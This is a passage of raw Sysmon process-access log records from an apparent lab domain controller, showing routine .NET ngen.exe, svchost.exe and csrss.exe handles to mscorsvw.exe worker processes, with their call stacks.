3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.321{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0502-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.305{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0502-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.305{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0502-000000009A01}4648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.227{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4573-6000-0402-000000009A01}2152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.211{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4573-6000-0402-000000009A01}2152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:55.211{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4573-6000-0402-000000009A01}2152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.961{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4574-6000-1302-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.946{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4574-6000-1302-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.946{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4574-6000-1302-000000009A01}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.883{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4574-6000-1202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.868{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4574-6000-1202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.868{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4574-6000-1202-000000009A01}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.711{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4574-6000-1102-000000009A01}1316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.696{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4574-6000-1102-000000009A01}1316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.696{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4574-6000-1102-000000009A01}1316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.633{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4574-6000-1002-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.618{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4574-6000-1002-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:56.618{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4574-6000-1002-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.961{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1F02-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.961{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1F02-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.961{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1F02-000000009A01}4368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.915{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1E02-000000009A01}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.899{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1E02-000000009A01}4664C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 